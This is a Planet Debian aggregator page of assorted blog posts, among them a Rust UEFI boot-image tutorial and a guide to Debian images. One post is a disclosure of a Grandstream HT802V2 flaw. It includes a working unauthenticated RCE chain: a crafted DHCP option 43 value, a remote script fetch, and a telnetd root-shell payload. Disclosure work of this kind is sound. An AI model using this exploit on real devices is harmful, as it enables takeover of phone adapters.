Note that protobuf 3.25.4 on experimental depends on older absl 20230802, so it must be rebuilt against absl 20240722.0.

And more, we need to consider how to migrate from GTK renderer to Qt renderer in the future.

23 February, 2025 01:14PM

Valhalla's Things

Water Resistant Hood

Posted on February 23, 2025
Tags: madeof:atoms, craft:sewing, FreeSoftWear

a person wearing a relatively boxy water resistant jacket with pockets and a zipper, and a detached hood with a big square cowl that reaches mid-torso.

Many years ago I made myself a vest with lots of pockets 1 in a few layers of cheap cotton, and wore the hell out of it, for the added warmth, but most importantly for the convenience provided by the pockets.

the same person showing just the vest, with two applied pockets on the bust, closed with buttons, and two big flaps covering two welted pockets at waist level, plus a strip of fabric with loops where things may be attached.

Then a few years ago the cheap cotton had started to get worn, and I decided I needed to replace it. I found a second choice (and thus cheaper :) ) version of a water-repellent cotton and made another vest, lined with regular cotton, for a total of just two layers.

the same person, this time there are also two sleeves, attached to the vest with big snaps, the outline of which can be seen on the vest. they are significantly less faded than the vest.

This time I skipped a few pockets that I had found I didn’t use that much, and I didn’t add a hood, which didn’t play that well when worn over a hoodie, but I added some detached sleeves, for additional wind protection.

This left about 60 cm and some odd pieces of leftover fabric in my stash, for which I had no plan.

the hood pulled down on the back, showing the big square cowl.

And then February2 came, and I needed a quick simple mindless handsewing projects for the first weekend, I saw the vest (which I’m wearing as much as the old one), the sleeves (which have been used much less, but I’d like to change this) and thought about making a matching hood for it, using my square hood pattern.

Since the etaproof is a bit stiff and not that nice to the touch I decide to line3 it with the same cotton as the vest and sleeves, and in the style of the pattern I did so by finishing each panel with its own lining (with regular cotton thread) and then whipstitching the panels together with the corespun cotton/poly thread recommended by the seller of the fabric. I’m not sure this is the best way to construct something that is supposed to resist the rain, but if I notice issues I can always add some sealing tape afterwards.

I do have a waterproof cape to wear in case of real rain, so this is only supposed to work for light rain anyway, and it may prove not to be an issue.

As something designed to be worn in light rain, this is also something likely to be worn in low light conditions, where 100% black may not be the wisest look. On the vest I had added reflective piping to the armscyes, but I was out of the same piping.

from the front; a flash was used to take the picture, making the border of the cowl very visible.

I did however have a spool of reflector thread made of glass fibre by Rico Design, which I think was originally sold to be worked into knitting or crochet projects (it is now discontinued) and I had never used.

I decided to try and sew a decorative blanket stitch border, a decision I had reasons to regret, since the thread broke and tangled like crazy, but in the end it was done, I like how it looks, and it seems pretty functional. I hope it won’t break with time and use, and if it does I’ll either fix it or try to redo with something else.

Of course, the day I finished sewing the reflective border it stopped raining, so I haven’t worn it yet, but I hope I’ll be able to, and if it is an horrible failure I’ll make sure to update this post.


  1. and I’ve just realized that I haven’t migrated that pattern to my pattern website, and I should do that. just don’t hold your breath for it to happen O:-). And for the time being it will not have step-by-step pictures, as I currently don’t need another vest.↩︎

  2. and February of course means a weekend in front of a screen that is showing a live-streamed conference.↩︎

  3. and of course I updated the pattern with instructions on how to add a lining.↩︎

23 February, 2025 12:00AM

February 21, 2025

hackergotchi for Jonathan Dowland

Jonathan Dowland

haskell streaming libraries

For my PhD, my colleagues/collaborators and I built a distributed stream-processing system using Haskell. There are several other Haskell stream-processing systems. How do they compare?

First, let's briefly discuss and define streaming in this context.

Structure and Interpretation of Computer Programs introduces Streams as an analogue of lists, to support delayed evaluation. In brief, the inductive list type (a list is either an empty list or a head element pre-pended to another list) is replaced with a structure with a head element and a promise which, when evaluated, will generate the tail (which in turn may have a head element and a promise to generate another tail, culminating in the equivalent of an empty list.) Later on SICP also covers lazy evaluation.

However, the streaming we're talking about originates in the relational community, rather than the functional one, and is subtly different. It's about building a pipeline of processing that receives and emits data but doesn't need to (indeed, cannot) reference the whole stream (which may be infinite) at once.

Haskell streaming systems

Now let's go over some Haskell streaming systems.

conduit (2011-)

Conduit is the oldest of the ones I am reviewing here, but I doubt it's the first in the Haskell ecosystem. If I've made any obvious omissions, please let me know!

Conduit provides a new set of types to model streaming data, and a completely new set of functions which are analogues of standard Prelude functions, e.g. sumC in place of sum. It provides its own combinator(s) such as .| ( aka fuse) which is like composition but reads left-to-right.

The motivation for this is to enable (near?) constant memory usage for processing large streams of data -- presumably versus using a list-based approach and to provide some determinism: the README gives the example of "promptly closing file handles". I think this is another way of saying that it uses strict evaluation, or at least avoids lazy evaluation for some things.

Conduit offers interleaved effects: which is to say, IO can be performed mid-stream.

Conduit supports distributed operation via Data.Conduit.Network in the conduit-extra package. Michael Snoyman, principal Conduit author, wrote up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async To write a distributed Conduit application, the application programmer must manually determine the boundaries between the clients/servers and write specific code to connect them.

pipes (2012-)

The Pipes Tutorial contrasts itself with "Conventional Haskell stream programming": whether that means Conduit or something else, I don't know.

Paraphrasing their pitch: Effects, Streaming Composability: pick two. That's the situation they describe for stream programming prior to Pipes. They argue Pipes offers all three.

Pipes offers it's own combinators (which read left-to-right) and offers interleaved effects.

At this point I can't really see what fundamentally distinguishes Pipes from Conduit.

Pipes has some support for distributed operation via the sister library pipes-network. It looks like you must send and receive ByteStrings, which means rolling your own serialisation for other types. As with Conduit, to send or receive over a network, the application programmer must divide their program up into the sub-programs for each node, and add the necessary ingress/egress code.

io-streams (2013-)

io-streams emphasises simple primitives. Reading and writing is done under the IO Monad, thus, in an effectful (but non-pure) context. The presence or absence of further stream data are signalled by using the Maybe type (Just more data or Nothing: the producer has finished.)

It provides a library of functions that shadow the standard Prelude, such as S.fromList, S.mapM, etc.

It's not clear to me what the motivation for io-streams is, beyond providing a simple interface. There's no declaration of intent that I can find about (e.g.) constant-memory operation.

There's no mention of or support (that I can find) for distributed operation.

streaming (2015-)

Similar to io-streams, Streaming emphasises providing a simple interface that gels well with traditional Haskell methods. Streaming provides effectful streams (via a Monad -- any Monad?) and a collection of functions for manipulating streams which are designed to closely mimic standard Prelude (and Data.List) functions.

Streaming doesn't push its own combinators: the examples provided use $ and read right-to-left.

The motivation for Streaming seems to be to avoid memory leaks caused by extracting pure lists from IO with traditional functions like mapM, which require all the list constructors to be evaluated, the list to be completely deconstructed, and then a new list constructed.

Like io-streams, the focus of the library is providing a low-level streaming abstraction, and there is no support for distributed operation.

streamly (2017-)

Streamly appears to have the grand goal of providing a unified programming tool as suited for quick-and-dirty programming tasks (normally the domain of scripting languages) and high-performance work (C, Java, Rust, etc.). Their intended audience appears to be everyone, or at least, not just existing Haskell programmers. See their rationale

Streamly offers an interface to permit composing concurrent (note: not distributed) programs via combinators. It relies upon fusing a streaming pipeline to remove intermediate list structure allocations and de-allocations (i.e. de-forestation, similar to GHC rewrite rules)

The examples I've seen use standard combinators (e.g. Control.Function.&, which reads left-to-right, and Applicative).

Streamly provide benchmarks versus Haskell pure lists, Streaming, Pipes and Conduit: these generally show Streamly several orders of magnitude faster.

I'm finding it hard to evaluate Streamly. It's big, and it's focus is wide. It provides shadows of Prelude functions, as many of these libraries do.

wrap-up

It seems almost like it must be a rite-of-passage to write a streaming system in Haskell. Stones and glass houses, I'm guilty of that too.

The focus of the surveyed libraries is mostly on providing a streaming abstraction, normally with an analogous interface to standard Haskell lists. They differ on various philosophical points (whether to abstract away the mechanics behind type synonyms, how much to leverage existing Haskell idioms, etc). A few of the libraries have some rudimentary support for distributed operation, but this is limited to connecting separate nodes together: in some cases serialising data remains the application programmer's job, and in all cases the application programmer must manually carve up their processing according to a fixed idea of what nodes they are deploying to. They all define a fixed-function pipeline.

21 February, 2025 11:52AM

hackergotchi for Luke Faraone

Luke Faraone

I'm running for the OSI board... maybe

The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats. 

In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.

Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February. 

I was dismayed when I received the following mail from Nick Vidal:

Dear Luke,

Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.

We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.

Best regards,
OSI Election Teams

Nowhere on the "OSI’s board of directors in 2025: details about the elections" page do they list a timezone for closure of nominations; they simply list Monday 17 February. 

The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.

I was not able to participate in the "potential board director" info sessions accordingly, but people who attended heard that the importance of accommodating differing TZ's was discussed during the info session, and that OSI representatives mentioned they try to accommodate TZ's of everyone. This seems in sharp contrast with the above policy. 

I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle. 

21 February, 2025 10:35AM by Luke Faraone (noreply@blogger.com)

Russell Coker

Reproducible Builds (diffoscope)

diffoscope 289 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 289. This version includes the following changes:

[ Chris Lamb ]
* Catch CalledProcessError when calling html2text.
* Update copyright years.

You find out more by visiting the project homepage.

21 February, 2025 12:00AM

Michael Ablassmeier

virtnbdbackup 2.21

Yesterday i released a new version of virtnbdbackup with a nice improvement.

The new version can now detect zeroed regions in the bitmaps by comparing the block regions against the state within the base bitmap during incremental backup.

This is helpful if virtual machines run fstrim, as it results in less backup footprint. Before the incremental backups could grow the same amount of size as fstrimmed data regions.

I also managed to enhance the tests by using the arch linux cloud images. The automated github CI tests now actually test backup and restores against a virtual machine running an real OS.

21 February, 2025 12:00AM

February 20, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

Rcpp now used by 3000 CRAN packages!

3000 Rcpp packages

As of today, Rcpp stands at 3001 reverse-dependencies on CRAN. The graph on the left depicts the growth of Rcpp usage (as measured by Depends, Imports and LinkingTo, but excluding Suggests) over time.

Rcpp was first released in November 2008. It took seven year years to clear 500 packages in late October 2015 after which usage of R and Rcpp accelerated: 1000 packages in April 2017, 1500 packages in November 2018, 2000 packages in July 2020, and 2500 package in February 2022. The chart extends to the very beginning via manually compiled data from CRANberries and checked with crandb. The core part of the data set is generated semi-automatically when updating a (manually curated) list of packages using Rcpp that is available too.

The Rcpp team aims to keep Rcpp as performant and reliable as it has been (and see e.g. here for more details). Last month’s 1.0.14 release post is a good example of the ongoing work. A really big shoutout and Thank You! to all users and contributors of Rcpp for help, suggestions, bug reports, documentation or, of course, code.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

20 February, 2025 09:14PM

hackergotchi for Paul Tagliamonte

Paul Tagliamonte

boot2kier

I can’t remember exactly the joke I was making at the time in my work’s slack instance (I’m sure it wasn’t particularly funny, though; and not even worth re-reading the thread to work out), but it wound up with me writing a UEFI binary for the punchline. Not to spoil the ending but it worked - no pesky kernel, no messing around with “userland”. I guess the only part of this you really need to know for the setup here is that it was a Severance joke, which is some fantastic TV. If you haven’t seen it, this post will seem perhaps weirder than it actually is. I promise I haven’t joined any new cults. For those who have seen it, the payoff to my joke is that I wanted my machine to boot directly to an image of Kier Eagan.

As for how to do it – I figured I’d give the uefi crate a shot, and see how it is to use, since this is a low stakes way of trying it out. In general, this isn’t the sort of thing I’d usually post about – except this wound up being easier and way cleaner than I thought it would be. That alone is worth sharing, in the hopes someome comes across this in the future and feels like they, too, can write something fun targeting the UEFI.

First thing’s first – gotta create a rust project (I’ll leave that part to you depending on your life choices), and to add the uefi crate to your Cargo.toml. You can either use cargo add or add a line like this by hand:

uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }

We also need to teach cargo about how to go about building for the UEFI target, so we need to create a rust-toolchain.toml with one (or both) of the UEFI targets we’re interested in:

[toolchain]
targets = ["aarch64-unknown-uefi", "x86_64-unknown-uefi"]

Unfortunately, I wasn’t able to use the image crate, since it won’t build against the uefi target. This looks like it’s because rustc had no way to compile the required floating point operations within the image crate without hardware floating point instructions specifically. Rust tends to punt a lot of that to libm usually, so this isnt entirely shocking given we’re nostd for a non-hardfloat target.

So-called “softening” requires a software floating point implementation that the compiler can use to “polyfill” (feels weird to use the term polyfill here, but I guess it’s spiritually right?) the lack of hardware floating point operations, which rust hasn’t implemented for this target yet. As a result, I changed tactics, and figured I’d use ImageMagick to pre-compute the pixels from a jpg, rather than doing it at runtime. A bit of a bummer, since I need to do more out of band pre-processing and hardcoding, and updating the image kinda sucks as a result – but it’s entirely manageable.

$ convert -resize 1280x900 kier.jpg kier.full.jpg
$ convert -depth 8 kier.full.jpg rgba:kier.bin

This will take our input file (kier.jpg), resize it to get as close to the desired resolution as possible while maintaining aspect ration, then convert it from a jpg to a flat array of 4 byte RGBA pixels. Critically, it’s also important to remember that the size of the kier.full.jpg file may not actually be the requested size – it will not change the aspect ratio, so be sure to make a careful note of the resulting size of the kier.full.jpg file.

Last step with the image is to compile it into our Rust bianary, since we don’t want to struggle with trying to read this off disk, which is thankfully real easy to do.

const KIER: &[u8] = include_bytes!("../kier.bin");
const KIER_WIDTH: usize = 1280;
const KIER_HEIGHT: usize = 641;
const KIER_PIXEL_SIZE: usize = 4;

Remember to use the width and height from the final kier.full.jpg file as the values for KIER_WIDTH and KIER_HEIGHT. KIER_PIXEL_SIZE is 4, since we have 4 byte wide values for each pixel as a result of our conversion step into RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop that down to 3. I don’t entirely know why I kept alpha around, but I figured it was fine. My kier.full.jpg image winds up shorter than the requested height (which is also qemu’s default resolution for me) – which means we’ll get a semi-annoying black band under the image when we go to run it – but it’ll work.

Anyway, now that we have our image as bytes, we can get down to work, and write the rest of the code to handle moving bytes around from in-memory as a flat block if pixels, and request that they be displayed using the UEFI GOP. We’ll just need to hack up a container for the image pixels and teach it how to blit to the display.

/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
struct RgbImage {
/// Size of the image as a tuple, as the
 /// (width, height)
 size: (usize, usize),
/// raw pixels we'll send to the display.
 inner: Vec<BltPixel>,
}
impl RgbImage {
/// Create a new `RgbImage`.
 fn new(width: usize, height: usize) -> Self {
RgbImage {
size: (width, height),
inner: vec![BltPixel::new(0, 0, 0); width * height],
}
}
/// Take our pixels and request that the UEFI GOP
 /// display them for us.
 fn write(&self, gop: &mut GraphicsOutput) -> Result {
gop.blt(BltOp::BufferToVideo {
buffer: &self.inner,
src: BltRegion::Full,
dest: (0, 0),
dims: self.size,
})
}
}
impl Index<(usize, usize)> for RgbImage {
type Output = BltPixel;
fn index(&self, idx: (usize, usize)) -> &BltPixel {
let (x, y) = idx;
&self.inner[y * self.size.0 + x]
}
}
impl IndexMut<(usize, usize)> for RgbImage {
fn index_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
let (x, y) = idx;
&mut self.inner[y * self.size.0 + x]
}
}

We also need to do some basic setup to get a handle to the UEFI GOP via the UEFI crate (using uefi::boot::get_handle_for_protocol and uefi::boot::open_protocol_exclusive for the GraphicsOutput protocol), so that we have the object we need to pass to RgbImage in order for it to write the pixels to the display. The only trick here is that the display on the booted system can really be any resolution – so we need to do some capping to ensure that we don’t write more pixels than the display can handle. Writing fewer than the display’s maximum seems fine, though.

fn praise() -> Result {
let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
let mut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;
// Get the (width, height) that is the minimum of
 // our image and the display we're using.
 let (width, height) = gop.current_mode_info().resolution();
let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));
let mut buffer = RgbImage::new(width, height);
for y in 0..height {
for x in 0..width {
let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
let pixel = &mut buffer[(x, y)];
pixel.red = KIER[idx_r];
pixel.green = KIER[idx_r + 1];
pixel.blue = KIER[idx_r + 2];
}
}
buffer.write(&mut gop)?;
Ok(())
}

Not so bad! A bit tedious – we could solve some of this by turning KIER into an RgbImage at compile-time using some clever Cow and const tricks and implement blitting a sub-image of the image – but this will do for now. This is a joke, after all, let’s not go nuts. All that’s left with our code is for us to write our main function and try and boot the thing!

#[entry]
fn main() -> Status {
uefi::helpers::init().unwrap();
praise().unwrap();
boot::stall(100_000_000);
Status::SUCCESS
}

If you’re following along at home and so interested, the final source is over at gist.github.com. We can go ahead and build it using cargo (as is our tradition) by targeting the UEFI platform.

$ cargo build --release --target x86_64-unknown-uefi

Testing the UEFI Blob

While I can definitely get my machine to boot these blobs to test, I figured I’d save myself some time by using QEMU to test without a full boot. If you’ve not done this sort of thing before, we’ll need two packages, qemu and ovmf. It’s a bit different than most invocations of qemu you may see out there – so I figured it’d be worth writing this down, too.

$ doas apt install qemu-system-x86 ovmf

qemu has a nice feature where it’ll create us an EFI partition as a drive and attach it to the VM off a local directory – so let’s construct an EFI partition file structure, and drop our binary into the conventional location. If you haven’t done this before, and are only interested in running this in a VM, don’t worry too much about it, a lot of it is convention and this layout should work for you.

$ mkdir -p esp/efi/boot
$ cp target/x86_64-unknown-uefi/release/*.efi \
 esp/efi/boot/bootx64.efi

With all this in place, we can kick off qemu, booting it in UEFI mode using the ovmf firmware, attaching our EFI partition directory as a drive to our VM to boot off of.

$ qemu-system-x86_64 \
 -enable-kvm \
 -m 2048 \
 -smbios type=0,uefi=on \
 -bios /usr/share/ovmf/OVMF.fd \
 -drive format=raw,file=fat:rw:esp

If all goes well, soon you’ll be met with the all knowing gaze of Chosen One, Kier Eagan. The thing that really impressed me about all this is this program worked first try – it all went so boringly normal. Truly, kudos to the uefi crate maintainers, it’s incredibly well done.

Booting a live system

Sure, we could stop here, but anyone can open up an app window and see a picture of Kier Eagan, so I knew I needed to finish the job and boot a real machine up with this. In order to do that, we need to format a USB stick. BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives are NVMe, so BE CAREFUL – if you use SATA, it may very well be your hard drive! Please do not destroy your computer over this.

$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Once that looks good (depending on your flavor of udev you may or may not need to unplug and replug your USB stick), we can go ahead and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR USB STICK) and write our EFI directory to it.

$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi

Of course, naturally, devotion to Kier shouldn’t mean backdooring your system. Disabling Secure Boot runs counter to the Core Principals, such as Probity, and not doing this would surely run counter to Verve, Wit and Vision. This bit does require that you’ve taken the step to enroll a MOK and know how to use it, right about now is when we can use sbsign to sign our UEFI binary we want to boot from to continue enforcing Secure Boot. The details for how this command should be run specifically is likely something you’ll need to work out depending on how you’ve decided to manage your MOK.

$ doas sbsign \
 --cert /path/to/mok.crt \
 --key /path/to/mok.key \
 target/x86_64-unknown-uefi/release/*.efi \
 --output esp/efi/boot/bootx64.efi

I figured I’d leave a signed copy of boot2kier at /boot/efi/EFI/BOOT/KIER.efi on my Dell XPS 13, with Secure Boot enabled and enforcing, just took a matter of going into my BIOS to add the right boot option, which was no sweat. I’m sure there is a way to do it using efibootmgr, but I wasn’t smart enough to do that quickly. I let ‘er rip, and it booted up and worked great!

It was a bit hard to get a video of my laptop, though – but lucky for me, I have a Minisforum Z83-F sitting around (which, until a few weeks ago was running the annual http server to control my christmas tree ) – so I grabbed it out of the christmas bin, wired it up to a video capture card I have sitting around, and figured I’d grab a video of me booting a physical device off the boot2kier USB stick.

Attentive readers will notice the image of Kier is smaller then the qemu booted system – which just means our real machine has a larger GOP display resolution than qemu, which makes sense! We could write some fancy resize code (sounds annoying), center the image (can’t be assed but should be the easy way out here) or resize the original image (pretty hardware specific workaround). Additionally, you can make out the image being written to the display before us (the Minisforum logo) behind Kier, which is really cool stuff. If we were real fancy we could write blank pixels to the display before blitting Kier, but, again, I don’t think I care to do that much work.

But now I must away

If I wanted to keep this joke going, I’d likely try and find a copy of the original video when Helly 100%s her file and boot into that – or maybe play a terrible midi PC speaker rendition of Kier, Chosen One, Kier after rendering the image. I, unfortunately, don’t have any friends involved with production (yet?), so I reckon all that’s out for now. I’ll likely stop playing with this – the joke was done and I’m only writing this post because of how great everything was along the way.

All in all, this reminds me so much of building a homebrew kernel to boot a system into – but like, good, though, and it’s a nice reminder of both how fun this stuff can be, and how far we’ve come. UEFI protocols are light-years better than how we did it in the dark ages, and the tooling for this is SO much more mature. Booting a custom UEFI binary is miles ahead of trying to boot your own kernel, and I can’t believe how good the uefi crate is specifically.

Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.

20 February, 2025 02:40PM

hackergotchi for Evgeni Golov

Evgeni Golov

Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.


        [ -n "$vendor" ] && {
                VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`"
                if [ -n "$VENDOR_TEST_SERVER" ]; then
                        /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
                fi

According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh.

What's /app/bin/vendor_test_suite.sh? It's this nice script:

#!/bin/sh

TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080

cd /tmp

wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} 
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
        corefile_dec ${TEST_SCRIPT}
        if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
        fi
fi

It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915. But we also can just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed.

I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload.

That means we can take a simple payload like:

#!/bin/sh
# you need exactly that shebang, yes

telnetd -l /bin/sh -p 1270 &

Encrypt it using encfile and place it on a webserver as vendor_test.sh.

The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port.

This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222.

In Python:

>>> server = "192.168.42.222"
>>> ":".join([f'{y:02x}' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'

So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :)

As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /usr/share/udhcpc/default.script and /app/bin/vendor_test_suite.sh look very similar, according to firmware dumps

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to

#!/bin/sh

TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"

cd /tmp

wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} 
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
    if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x ${VENDOR_SCRIPT}
        ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi

The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.

Timeline

20 February, 2025 11:38AM by evgeni

February 19, 2025

Scarlett Gately Moore

KDE Snaps are broken, sorry lights out for now

All core22 KDE snaps are broken. There is not an easy fix. We have used kde-neon repos since inception and haven’t had issues until now.

libEGL fatal: DRI driver not from this Mesa build (‘23.2.1-1ubuntu3.1~22.04.3’ vs ‘23.2.1-1ubuntu3.1~22.04.2’)

Apparently Jammy had a mesa update?

Option 1: Rebuild our entire stack without neon repos ( fails due to dependencies not in Jammy, would require tracking down all of these and build from source )

Option 2: Finish the transition to core24 ( This is an enormous task and will take some time still )

Either option will take more time and effort than I have. I need to be job hunting as I have run out of resources to pay my bills. My internet/phone will be cut off in days. I am beyond stressed out and getting snippy with folks, for that I apologize. If someone wants to sponsor the above work then please donate to https://gofund.me/fe30793b otherwise I am stepping away to rethink life and my defunct career.

I am truly sorry everyone.

New core24 Snaps:

Arianna – Epub viewer

k3b – Disc burner

Snapcraft:

Fixes for the qt5 kde-neon extension

https://github.com/canonical/snapcraft/pull/5261

19 February, 2025 02:17PM by sgmoore

hackergotchi for Thomas Lange

Thomas Lange

The secret maze of Debian images

TL;DR

It's difficult to find the right Debian image. We have thousands of ISO files and cloud images and we support multiple CPU architectures and several download methods. The directory structure of our main image server is like a maze, and our web pages for downloading are also confusing.

Most important facts from this blog post

The Debian maze

Debian maze

Did you ever searched for a specific Debian image which was not the default netinst ISO for amd64? How long did it take to find it?

Debian is very good at hiding their images for downloading by offering a huge amount of different versions and variants of images and multiple methods how to download them. Debian also has multiple web pages for

This is the secret Debian maze of images. It's currently filled with 8700+ different ISO images and another 34.000+ files (raw and qcow2) for the cloud images.

The main URL for the server hosting all Debian images is https://cdimage.debian.org/cdimage/

There, you will find installer images, live images, cloud images.

Let's try to find the right image you need

We have three different types of images:

  • Installer images can be booted on a computer without any OS and then the Debian installer can be started to perform a Debian installation
  • Live images boot a Debian desktop without installing anything to the local disks. You can give Debian a try and if you like it you can use the Calamers graphical installer for installing the same desktop onto the local disk.
  • Cloud images are meant for running a virtual machine with Debian using QEMU, KVM, OpenStack or in the Amazon AWS cloud or Microsoft Azure cloud.

Images for the stable release

Almost always, you are probably looking for the image to install the latest stable release. The URL https://cdimage.debian.org/cdimage/release/ shows:

12.9.0
12.9.0-live
current
current-live

but you cannot see that two are symlinks:

current -> 12.9.0/
current-live -> 12.9.0-live/

Here you will find the installer images and live images for the stable release (currently Debian 12, bookworm).

If you choose https://cdimage.debian.org/cdimage/release/12.9.0/ you will see a list of CPU architectures:

amd64
arm64
armel
armhf
i386
mips64el
mipsel
ppc64el
s390x
source
trace

(BTW source and trace are no CPU architectures)

The typical end user will not care about most architectures, because your computer will actually always need images from the amd64 folder. Maybe you have heard that your computer has a 64bit CPU and even if you have an Intel processor we call this architecture amd64.

Let's see what's in the folder amd64:

bt-bd
bt-cd
bt-dvd
iso-bd
iso-cd
iso-dvd
jigdo-16G
jigdo-bd
jigdo-cd
jigdo-dlbd
jigdo-dvd
list-16G
list-bd
list-cd
list-dlbd
list-dvd

Wow. This is confusing and there's no description what all those folders mean.

  • bt = BitTorrent, a peer-to-peer file sharing protocol
  • iso = directories containing ISO files
  • jigdo = a very special download option only for experts who know they really want this
  • list = contains lists of the names of the .deb files which are included on the images

The first three are different methods how to download an image. Use iso when a single network connection will be fast enough for you. Using bt can result in a faster download, because it downloads via a peer-to-peer file sharing protocol. You need an additional torrent program for downloading.

Then we have these variants:

  • bd = Blu-ray disc      (size up to 8GB)
  • cd = CD image          (size up to 700MB)
  • dvd = DVD images   (size up to 4.7GB)
  • 16G = for an USB stick of 16GB or larger
  • dlbd = dual layer Blu-ray disc

16G and dlbd images are only available via jigdo. All iso-xx and bt-xx folders provide the same images but with a different access method.

Here are examples of images:

  iso-cd/debian-12.9.0-amd64-netinst.iso
  iso-cd/debian-edu-12.9.0-amd64-netinst.iso
  iso-cd/debian-mac-12.9.0-amd64-netinst.iso

